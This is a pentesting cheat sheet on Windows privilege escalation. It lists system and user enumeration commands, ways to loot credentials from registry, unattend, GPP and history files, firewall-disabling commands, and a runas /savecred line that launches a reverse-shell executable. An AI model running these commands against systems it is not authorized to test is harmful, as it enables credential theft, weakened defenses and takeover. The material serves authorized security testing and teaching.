- Windows Privilege Escalation

Enumeration

Manual

System / Version Information

#Show Windows version and patchlevel:
ver
 
#Show all environment variables (including PATH):
set
 
#Show the hostname:
hostname
 
#Show summary of hardware information and system information:
systeminfo
 
#Check boot options (legacy BIOS systems only; boot.ini is absent on Windows Vista and later, which keep boot settings in the BCD store shown by bcdedit):
more c:\boot.ini
 
#Show applied patches:
wmic qfe
 
#Get OS architecture (x86 / x64):
wmic os get osarchitecture

User Enumeration

#Check your user rights, privileges and member groups:
whoami /all
 
#Get information about local users:
net user
 
#Get Domain accounts:
net user /domain
 
#List the members of the local Administrators group:
net localgroup Administrators
 
#Get information about a specific domain account:
net user jarnoadmin /domain
 
#Get domain groups:
net group /domain
 
#Anything in the registry for automatic logon (a DefaultPassword value means a clear-text password is stored there):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
 
#Check who is currently logged in:
qwinsta

Processes

# Display running processes and the services hosted in each one:
tasklist /svc
 
# Display verbose task information:
tasklist /v

Services

#Get all services
powershell -command Get-Service
 
#Get services and the account each one runs as:
wmic service get name,startname
 
#Get all services, or change "state" to only view "active" or "inactive" services:
sc query type= service state= all
 
#Find a specific service:
sc query type= service state= all | findstr "%SERVICENAME%"
 
#Set service to start automatically:
sc config FreeSSHDService start= auto
 
#Start a service:
net start %SERVICENAME%
 
#Check service configuration (binary path, start type and run-as account):
sc qc %SERVICENAME%
 
#Find unquoted service paths:
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

Password Policy

#Check password and account-lockout policy:
net accounts

Password looting

Tools
- Seatbelt.exe

- PowerSploit
Get-CachedGPPPassword //For locally stored GP Files
Get-GPPPassword //For GP Files stored in the DC
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-RegistryAutoLogon

- msf
post/windows/gather/credentials/gpp

Group Policy Preferences

dir "C:\ProgramData\Microsoft\Group Policy\History\<DOMAIN>\Machine\Preferences\Groups\Groups.xml"
dir \\<DOMAIN>\SYSVOL\\Policies\<DOMAIN>\MACHINE\Preferences\Groups\Groups.xml

Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

Unattended Install files

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml

Credential manager

cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

By file name

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

By file content

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul
findstr /spin "password" *.* 2>nul
dir /s *pass* == *vnc* == *.config* 2>nul (produces a lot of output)

Get-Childitem -Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

In registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#Windows autologon (cmd does not treat a trailing "#" as a comment, so the notes are kept on their own lines):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
#SNMP parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
#PuTTY sessions (may hold clear-text proxy credentials):
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
#VNC credentials:
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

In saved sessions (SessionGopher)
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module <full_path>\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

A full path is mandatory for Import-Module.

In PowerShell history

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Network Information

#Active connections and listening ports, with the owning process ID:
netstat -ano
 
#Get information from the ARP table
arp -a
 
#Get IP information:
ipconfig /all
 
#Show current routing table:
route print

List all network shares

net share

Firewall Information

#Check firewall status:
netsh firewall show state
 
#Check configured firewall rules:
netsh firewall show config
 
#Check detailed configured firewall rules:
netsh advfirewall firewall show rule name=all
 
#Export detailed configured firewall rules:
netsh advfirewall export "firewall.txt"

To check whether Windows Defender is running:

sc query windefend

Manually look at the services to find whether a third-party AV is running:

sc queryex type= service

List the firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

Scheduled Tasks

#Get all scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
 
#PowerShell version of the above command:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Connected Devices

#Get logical disk information:
wmic logicaldisk get caption,description,providername

Installed Software

#Get installed software (without /s this lists only the direct subkeys of HKLM\SOFTWARE):
reg query HKEY_LOCAL_MACHINE\SOFTWARE
 
#List software folders with Powershell:
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime

Drivers

#Get all available drivers:
driverquery

Startup Items

#Get all startup items:
wmic startup get caption,command
 
#Get all startup items based on the Run values in the registry:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
 
#Get all startup items that run once on the next startup, based on the RunOnce values in the registry:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
 
#List all startup shortcuts in the start-menu Startup folder for every user (Windows XP/2003 path; newer versions use %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup):
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
 
#List all startup shortcuts in the start-menu Startup folder for a specific user (Windows XP/2003 path; newer versions use %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup):
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Plaintext Users and Passwords

#Find TXT files that contain the string "password":
findstr /si password *.txt
 
#Find XML files that contain the string "password":
findstr /si password *.xml
 
#Find INI files that contain the string "password":
findstr /si password *.ini
 
#Common files that usually contain credentials:
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini
 
#Common registry paths that usually contain credentials:
#VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
 
#Windows autologin information:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
#SNMP parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
 
#Putty sessions:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Stored Credentials

#Check for stored credentials:
cmdkey /list
 
#Use saved credentials:
runas /savecred /user:WORKGROUP\Administrator "your_rev_shell.exe"
 
#Find other interesting files based on filename, like "password.txt":
dir /a password.txt /s /p

Automatic

I like to use tools to make this phase faster and avoid spending much time on manual enumeration. The top tools I use are:

winPEAS.exe > output.txt
Import-Module .\PowerUp.ps1
Invoke-AllChecks
python wes.py --update
systeminfo > systeminfo.txt
python wes.py systeminfo.txt